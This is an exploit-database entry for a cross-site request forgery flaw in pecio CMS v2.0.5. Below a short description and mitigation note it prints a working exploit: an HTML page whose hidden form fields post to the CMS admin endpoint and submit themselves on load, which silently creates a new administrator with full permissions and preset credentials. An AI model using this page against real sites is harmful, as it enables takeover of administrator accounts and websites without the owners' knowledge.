pecio CMS v2.0.5 - exploit.company

vendor:

pecio CMS

by:

P0C T34M

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: pecio CMS

Affected Version From: 2.0.5

Affected Version To: 2.0.5

Patch Exists: NO

Related CWE: N/A

CPE: 2.0.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

pecio CMS v2.0.5 <= CSRF Add Admin

This exploit allows an attacker to add an admin user to the pecio CMS v2.0.5 application by sending a maliciously crafted request to the vulnerable application. The malicious request contains hidden form fields that are used to create a new admin user with full privileges. The exploit is triggered when the victim visits a malicious website or clicks a malicious link.

Mitigation:

The application should implement a CSRF token to verify that the request is coming from a trusted source. Additionally, the application should also implement a CAPTCHA to prevent automated requests.

Source

Exploit-DB raw data:

#Title    : pecio CMS v2.0.5 <= CSRF Add Admin
#Script   : pecio CMS v2.0.5 
#Language : Php
#Download : Download: http://pecio-cms.com/pec_upload/files/pecio-2.0.5.zip
#Date     : 2010/12/25
#Found    : by P0C T34M >> tnt-r00t 
#Homepage : www.p0c.cc

<html>
<form name="tnt" action="http://127.0.0.1/pec/pec_admin/admin.php?area=users&ampview=default&action=create" method="post">

    <input type="hidden" name="user_name" type="hidden" value="myna0me"/ >
    <input type="hidden" name="user_forename" type="hidden" value="r00t" />
    <input type="hidden" name="user_surname" type="hidden" value="myname"/ >
    <input type="hidden" name="user_email" type="hidden" value="r00t@cr.tr" />
    <input type="hidden" name="user_password" type="hidden" value="r0o0t" />
    <input type="hidden" name="user_password_repeat" type="hidden" value="r0o0t" />  
                
                            <input type="hidden" name="user_perm_articles" id="perm_articles_full" value="2" checked="checked" type="radio">  
                            <input type="hidden" name="user_perm_menupoints" id="perm_menupoints_none" value="2" checked="checked" type="radio">  
                            <input type="hidden" name="user_perm_menupoints" id="perm_menupoints_full" value="2" checked="checked" type="radio">  
                            <input type="hidden" name="user_perm_texts" id="perm_texts_full" value="2" checked="checked" type="radio">         
                            <input type="hidden" name="user_perm_links" id="perm_links_full" value="2" checked="checked" type="radio">  
                            <input type="hidden" name="user_perm_posts" id="perm_posts_full" value="2" checked="checked" type="radio">   
                            <input type="hidden" name="user_perm_comments" id="perm_comments_full" value="2" checked="checked" type="radio">                     
                            <input type="hidden" name="user_perm_users" id="perm_users_full" value="2" checked="checked" type="radio">  
                            <input type="hidden" name="user_perm_plugins" id="perm_plugins_full" value="2" checked="checked" type="radio">               
                            <input type="hidden" name="user_perm_templates" id="perm_templates_full" value="2" checked="checked" type="radio">  
                            <input type="hidden" name="user_perm_settings" id="perm_settings_full" value="2" checked="checked" type="radio">  

<input type="hidden" name="Submit" class="submit" value="Add User" type="submit"/>
</form>
<script>document.tnt.submit();</script>
</html>
 
NickName : P0C T34M